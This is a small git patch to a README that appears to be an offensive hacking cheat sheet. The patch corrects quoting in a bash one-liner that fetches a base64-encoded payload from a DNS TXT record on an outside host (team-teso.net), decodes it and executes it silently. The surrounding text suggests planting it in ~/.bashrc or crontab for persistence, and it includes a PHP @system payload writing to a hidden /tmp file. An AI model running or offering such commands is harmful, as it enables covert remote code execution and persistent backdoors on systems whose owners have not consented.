From c378c2018a52711dc24f7da5abb9a40c7a3615db Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 20 Feb 2025 20:09:33 +0000 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index da6729c..a065ca1 100644 --- a/README.md +++ b/README.md @@ -1851,7 +1851,7 @@ echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0 Can also be triggered via `~/.bashrc` or the user's crontab. Use (example): ```shell # Use a "double bash" to redirect _also_ $()-subshell error to /dev/null: -bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \"|base64 -d);}"'&>/dev/null +bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \"\ |base64 -d);}"'&>/dev/null ```